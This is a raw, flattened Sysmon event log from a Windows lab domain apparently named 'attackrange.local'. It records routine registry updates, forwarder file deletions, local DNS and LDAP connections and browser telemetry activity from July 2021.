13241300x80000000000000001052984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\SentUpdateToIpBinary Data 13241300x80000000000000001052983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\DnsServersBinary Data 13241300x80000000000000001052982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\HostAddrsBinary Data 13241300x80000000000000001052981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\PrimaryDomainNameattackrange.local 13241300x80000000000000001052980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\AdapterDomainName(Empty) 13241300x80000000000000001052979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\Hostnamewin-dc-890 23542300x80000000000000001052978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:07.025{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0642138E608C5D97085D5E16769348D1,SHA256=8A1287A0B4E4C57D6C0F93582245EF4B57C4F935D304DABE6ED2F7EA4E58F146,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809515Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:05.306{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57403-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001052977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:07.009{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000001052976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
08:03:07.009{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\RegisteredSinceBootDWORD (0x00000001) 23542300x8000000000000000809517Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:08.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8565729E13F3F3E09A70C4B67CEFD10E,SHA256=E1FEECE599FB6D8C1B1389ECCA63F6D8EDE74983CCF2A61BB8C9C49602F6C69C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.683{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local61897-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001053012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.666{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local61896-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001053011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.633{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61895-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 22542200x80000000000000001053010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:07.095{466BC892-F73A-60EB-C27D-00000000CF01}9972win-dc-890.attackrange.local0fe80::dd0d:23d0:6a34:6621;::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 
354300x80000000000000001053009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.570{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local53248- 354300x80000000000000001053008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.569{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local58965-false10.0.1.14win-dc-890.attackrange.local53domain 354300x80000000000000001053007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.569{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local58965- 354300x80000000000000001053006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.569{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:98c0:7b90:86bb:ffff-58965-truea00:10e:0:0:0:0:0:0win-dc-890.attackrange.local53domain 354300x80000000000000001053005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.569{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61952- 354300x80000000000000001053004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.567{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61590- 
354300x80000000000000001053003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.567{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61590-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domain 354300x80000000000000001053002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.567{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62064- 354300x80000000000000001053001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.557{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61894-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001053000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.557{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61894-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001052999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.555{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local58308- 354300x80000000000000001052998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.553{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local61893-false10.0.1.14win-dc-890.attackrange.local53domain 
354300x80000000000000001052997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.553{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-890.attackrange.local61893-false10.0.1.14win-dc-890.attackrange.local53domain 354300x80000000000000001052996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.550{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local59217- 354300x80000000000000001052995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.550{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruefalse10.0.1.14win-dc-890.attackrange.local59217-false10.0.1.14win-dc-890.attackrange.local53domain 23542300x80000000000000001052994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:08.090{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64F436ADDF44CFBC66E62803BB728C69,SHA256=A7D38AD873728A5DB42446A12D06A85E19D020C3E854A87ACC9D700E03698EFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:07.995{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A69829D4D654E1740F781E0E95F3E002,SHA256=A125B61CF869E96A455EB8A4D1AF0B98463806A3FA9D36BEB54170448E281893,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809518Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:09.627{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AC06234AB9F170B5FA3D5B23DAE2CEF,SHA256=231F29ECB5C0EDDCAE0EDF1A39D82BE5104A10B03CC9B25362F3D81B532C6BC0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.683{00000000-0000-0000-0000-000000000000}9972<unknown process>-tcptruefalse10.0.1.14win-dc-890.attackrange.local61897-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001053016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.666{00000000-0000-0000-0000-000000000000}9972<unknown process>-tcptruefalse10.0.1.14win-dc-890.attackrange.local61896-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001053015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.633{00000000-0000-0000-0000-000000000000}9972<unknown process>-tcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61895-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001053014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:09.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=542EE0853EF22E8B52D204149E306A3E,SHA256=58F5967EEC2CC4621302448EAB9B912C71345EF2E02154D0A38F8803FFE1D5A7,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809519Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:10.627{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=419CB2C9DCFAF5174BC6567BD34A020A,SHA256=69382F7D50E74A9E29E51ABB935D735A9988478212766801BBD86697DDC0D5D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:10.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21EDE67C1DA7E96DF398FC6D47910FAE,SHA256=C3F201F4CCD2257BF0C63EF77C49BAAA302033834A97DF096C349AF008FB1B49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809520Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:11.643{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10A611BCA35D7C82FD2E5FBA83F9034B,SHA256=B473847DA07DD9C67A09141A060CA9BBA120791D70DD6EF986ABF76A0A31FC4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.174{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=AC8280A153DB32142BA3C9DFA2F4233B,SHA256=D3D3554B5AE329B241DCF9BB36DAB6CB023CD7355D7DFEA53E521059707E8400,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=007F3DEBB91E60D67D412723FFC722CE,SHA256=7E66EB6C0ECC7C6401189F9FC3156014CA8114B30F9A8EA12F4F11C07A25E95A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BE20FD5E367E09227C5D966A55920DC7,SHA256=6947D47028AD54A95AA88658A3AEE9052EB6B513F7243418116D20E7A330AE70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=04A3F6BD7A05DE607D909D1E55A0B92B,SHA256=E2E21B69BA793CF79B3169EDE70B05F7FCCE18CAD5AA312357B6B8A34539E240,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=89545DCB155C387E5EB245D1ADC05E8C,SHA256=F2D5F2015F0AE36BC5C79A908DEBD447582E3DC4DBDA40C862CE866497A71695,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F25B5958DD825B35F9F1E481EA98B5DC,SHA256=7043064C0D5C95D904E5EDD4E501CCAC7256E59261AB1F2EB57878CBECA74CCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E0A8B7EEB4C748FD5361FDDA994E336D,SHA256=E46114B6F273D64839BE8BF299D11848AAAA2940DC3F3641E5B154AE15F694CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=46D4B76470621EEF51AB03846F64B387,SHA256=FFB09F7B9FA861A82224337279361138FB86BE509D9B46383818EF0233EA3EE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D93173ABA9C918A794E23E106C05D925,SHA256=795DC158B7A95A31CD74DCEF9F13EEA185D6B08F6D5F9F545C003594CF498791,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=761DA70A70264FDF579F4E515C81B4EF,SHA256=A0B0219E5D04928912FC34E3947232103862AD50902BBB250D52F46052833C53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1AD4AD4BF1D08B06BB17E4B55BF1D466,SHA256=45265D47618D85D566CC7C34887A7A9C01B4DBBA65D28A01BFA4815813A62D1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A857125CB724D4BD1065E14AB3D67443,SHA256=7997B2CCF790DAA28390EA31A09B1042A25D0E67E87EF85A02935C5DC733C0F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809521Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:12.643{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6258B70AE341EF877A213181EF21060,SHA256=75D3A89D1E46C676550E4C65520CF44168944AE507F1B3F5C1408E19E7FCD4BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:12.843{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=241C7E9688BC1D49A831DDA5658CC23D,SHA256=8F3A0624F5BE297156C22D42A87815F6DC632CD28A52A5DB6B6F7B0CD22D8B4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:12.128{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59F4E79D22A81718CB13491B7315578D,SHA256=1C123312B3B557EFECF9184F04C8D64D686BB8F33D8F5C4A4FE24C96841C9536,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:03.879{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-890.attackrange.local138netbios-dgm 354300x80000000000000001053031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:03.879{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-890.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 
23542300x8000000000000000809523Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:13.658{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7C34658558C550FB38CCEE8E7C9867B,SHA256=1E5F37FF9F160A5752B7F2A007EFDD1395D8352B35F363C75BC648C9A344EB0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:13.143{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAABB7B644C888706F7E5B98C900221A,SHA256=138E71C5A6E5FA2A6DDEEF80D7647DFD3283FCF8518B1ED374B35398C5893043,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809522Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:11.306{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57404-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809524Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:14.662{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAB9E3F22941FC40885DE96C33EB6238,SHA256=97AFA1F723B97EA6295F762058AAD14D80394F644FDDB44ABB4485CAD9236BDF,IMPHASH=00000000000000000000000000000000falsetrue 
